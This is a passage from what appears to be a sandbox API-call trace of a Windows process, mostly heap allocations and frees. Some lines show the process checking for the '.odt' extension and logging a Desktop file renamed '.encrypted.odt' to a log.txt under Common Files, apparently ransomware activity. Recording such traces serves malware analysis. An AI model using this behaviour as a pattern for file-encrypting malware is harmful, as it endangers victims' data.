(HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0029.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0029.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="odt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".odt", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0029.655] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0029.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0029.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0029.655] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0029.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0029.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0029.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0029.655] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0029.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0029.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0029.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0029.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0029.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0029.655] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0029.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0029.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0029.655] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0029.656] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0029.656] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0029.656] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0029.656] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0029.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0029.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x89ffb8 [0029.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0029.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0029.656] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0029.656] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0xd2, lpOverlapped=0x0) returned 1 [0029.656] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0029.656] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0xd2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0029.656] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0029.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0029.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x89ffb8 | out: hHeap=0x770000) returned 1 [0029.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0029.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0029.657] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8IMSMp9nDKOk.encrypted.odt\r\n", cchWideChar=67, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 67 [0029.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x43) returned 0x88e138 [0029.657] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8IMSMp9nDKOk.encrypted.odt\r\n", cchWideChar=67, lpMultiByteStr=0x88e138, cbMultiByte=67, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8IMSMp9nDKOk.encrypted.odt\r\n", lpUsedDefaultChar=0x0) returned 67 [0029.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0029.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0029.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e138 | out: hHeap=0x770000) returned 1 [0029.657] WriteFile (in: hFile=0x140, lpBuffer=0x7f36e0*, nNumberOfBytesToWrite=0x42, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f36e0*, lpNumberOfBytesWritten=0x6aee3c*=0x42, lpOverlapped=0x0) returned 1 [0029.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0029.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0029.657] CloseHandle (hObject=0x140) returned 1 [0029.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0029.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0029.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0029.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0029.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0029.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0029.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0029.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0029.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c50e0 | out: hHeap=0x770000) returned 1 [0029.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0029.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0029.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0029.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0029.658] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0029.658] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0029.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0029.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0029.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0029.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0029.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0029.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0029.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0029.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0029.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0029.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0029.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0029.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0029.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0029.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0029.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0029.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0029.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0029.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0029.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0029.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0029.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0029.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0029.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0029.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0029.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0029.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0029.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0029.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0029.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0029.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0029.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0029.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0029.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0029.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0029.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0029.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0029.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0029.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0029.659] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0029.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0029.659] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0029.659] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0029.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0029.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0029.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0029.660] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0029.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0029.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0029.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0029.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af588 [0029.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0029.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0029.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0029.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0029.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0029.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0029.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0029.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8897d8 [0029.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0029.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0029.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0029.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0029.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0029.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0029.660] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0029.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0029.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0029.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0029.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0029.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0029.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0029.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0029.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0029.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0029.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0029.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0029.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0029.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0029.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0029.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0029.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0029.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0029.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0029.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0029.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0029.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0029.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0029.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0029.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0029.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0029.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0029.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0029.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0029.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0029.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0029.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0029.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0029.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0029.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0029.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0029.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0029.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0029.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0029.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0029.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0029.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0029.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0029.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0029.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0029.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0029.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0029.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0029.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0029.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0029.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0029.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0029.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0029.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0029.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0029.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0029.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0029.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0029.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0029.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0029.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0029.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0029.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0029.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0029.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0029.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0029.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0029.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0029.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0029.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0029.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0029.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0029.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0029.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0029.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0029.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0029.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0029.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0029.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0029.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0029.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0029.663] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0029.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0029.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0029.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0029.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0029.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0029.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0029.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0029.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0029.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0029.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0029.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0029.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0029.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0029.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0029.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0029.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0029.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0029.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0029.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0029.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, 